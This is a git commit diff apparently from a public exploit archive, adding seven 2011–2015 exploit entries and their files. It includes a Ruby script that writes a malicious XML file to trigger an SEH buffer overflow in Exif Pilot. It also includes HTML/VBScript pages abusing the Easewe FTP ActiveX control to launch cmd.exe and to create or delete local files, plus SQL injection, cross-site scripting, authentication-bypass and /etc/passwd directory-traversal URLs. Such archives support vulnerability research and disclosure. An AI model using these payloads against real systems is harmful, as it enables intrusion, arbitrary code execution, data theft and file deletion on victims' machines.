Update: 2015-01-24

7 new exploits
2015-01-24 08:35:30 +00:00 · 2015-01-24 08:35:30 +00:00 · a04c22126e
commit a04c22126e
parent dc7ad96825
8 changed files with 223 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32311,3 +32311,10 @@ id,file,description,date,author,platform,type,port
 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
+35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
+35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
+35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0
+35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0
+35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0
+35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
+35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
--- a/platforms/asp/webapps/35872.txt
+++ b/platforms/asp/webapps/35872.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/48384/info
+
+The H3C ER5100 is prone to a remote authentication-bypass vulnerability.
+
+Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. 
+
+http://www.example.com:8080/home.asp?userLogin.asp
+http://www.example.com:8080/wan_NAT.asp?userLogin.asp 
--- a/platforms/php/webapps/35871.txt
+++ b/platforms/php/webapps/35871.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48355/info
+
+Sitemagic CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Sitemagic CMS 2010.04.17 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?SMExt=[xss] 
--- a/platforms/php/webapps/35874.txt
+++ b/platforms/php/webapps/35874.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/48391/info
+
+Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/path/catalogue.php?id_shop=7[SQLI]
+http://www.example.com/path/article.php?id_article=7[SQLI]
+http://www.example.com/path/banniere.php?id_article=7[SQLI]
+http://www.example.com/path/detail_news.php?id_article=7[SQLI]
+http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI] 
--- a/platforms/php/webapps/35875.txt
+++ b/platforms/php/webapps/35875.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48392/info
+
+FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FanUpdate 3.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
--- a/platforms/php/webapps/35877.txt
+++ b/platforms/php/webapps/35877.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48399/info
+
+Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process. 
+
+http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png 
--- a/platforms/windows/dos/35870.rb
+++ b/platforms/windows/dos/35870.rb
@ -0,0 +1,70 @@
+#!/usr/bin/env ruby
+# Exploit Title: Exif Pilot SEH Based Buffer Overflow
+# Version: version 4.7.2
+# Download: http://www.colorpilot.com/load/exif.exe
+# Tested on: Windows XP sp2
+# Exploit Author: Osanda M. Jayathissa
+# E-Mail: osanda[cat]unseen.is 
+
+=begin
+Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml".
+The p/p/r addresses contains null characters. 
+=end
+require 'rex'
+
+def generate_content(padding1_len, padding2_len)
+  header = "\xff\xfe"
+  header << Rex::Text.to_unicode("<?xml version=\"1.0\" encoding=\"UTF-16\" ?>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("<efls>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("     <eflitem>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("          <maker>");
+  header << Rex::Text.to_unicode("");
+
+  for i in 0..padding1_len
+    header << Rex::Text.to_unicode("A");
+  end
+
+  header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH
+  header << Rex::Text.to_unicode("CCCC"); #SEH
+
+  for i in 0..padding2_len
+    header << Rex::Text.to_unicode("A");
+  end
+
+  header << "\x0d\x00\x0a\x00\x09\x00\x09\x00"
+  header << Rex::Text.to_unicode("  </maker>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("          <model>abc</model>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("          <factor>0.000000</factor>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("    </eflitem>")
+  header << "\x0d\x00\x0a\x00"
+  header << Rex::Text.to_unicode("</efls>")
+  header << "\x0d\x00\x0a\x00"
+  return header
+end
+
+##
+# main
+##
+
+filename = 'output.xml'
+output_handle = File.new(filename, 'wb')
+if !output_handle
+  $stdout.puts "Cannot open the file #{filename} for writing!"
+  exit -1
+end
+
+header = generate_content(1619, 7000)
+
+$stdout.puts "Generating file #{filename}"
+output_handle.puts   header
+output_handle.close
+
+$stdout.puts "Done!"
+exit 0
+#EOF
--- a/platforms/windows/dos/35876.html
+++ b/platforms/windows/dos/35876.html
@ -0,0 +1,102 @@
+source: http://www.securityfocus.com/bid/48393/info
+
+Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.
+
+Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.
+
+Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. 
+
+1.
+<html>
+<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
+<input language=VBScript onclick=Boom() type=button value="Exploit">
+<script language = 'vbscript'>
+Sub Boom()
+arg1="c:\windows\system32\cmd.exe"
+arg2=""
+arg3=1
+target.Execute arg1 ,arg2 ,arg3
+End Sub
+</script>
+</html>
+
+2.
+<html>
+<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
+<input language=VBScript onclick=Boom() type=button value="Exploit">
+<script language = 'vbscript'>
+Sub Boom()
+arg1="c:\windows\system32\cmd.exe"
+arg2=""
+arg3=1
+target.Run arg1 ,arg2 ,arg3
+End Sub
+</script>
+</html>
+
+3.
+<html>
+<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
+<input language=VBScript onclick=Boom() type=button value="Exploit">
+<script language = 'vbscript'>
+
+Sub Boom()
+arg1="FilePath\Filename_to_create"
+target.CreateLocalFile arg1
+End Sub
+
+</script>
+</html>
+
+4.
+<html>
+<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
+<input language=VBScript onclick=Boom() type=button value="Exploit">
+<script language = 'vbscript'>
+
+Sub Boom()
+arg1="Directorypath\Directory"
+target.CreateLocalFolder arg1
+End Sub
+
+</script>
+</html>
+
+5.
+<html>
+<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
+<input language=VBScript onclick=Boom() type=button value="Exploit">
+<script language = 'vbscript'>
+
+Sub Boom()
+arg1="FilePath\Filename_to_delete"
+target.DeleteLocalFile arg1
+End Sub
+</script>
+</html>
+
+<HTML>
+Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
+<br>
+Description There is Insecure Method in (LocalFileCreate) fonction<br>
+Found By : coolkaveh<br>
+
+<title>Exploited By : coolkaveh </title>
+<BODY>
+ <object id=cyber
+classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>
+
+<SCRIPT>
+
+function Do_it()
+ {
+     File = "kaveh.txt"
+   cyber.LocalFileCreate(File)
+ }
+
+</SCRIPT>
+<input language=JavaScript onclick=Do_it() type=button value="Click
+here To Test"><br>
+</body>
+</HTML>
+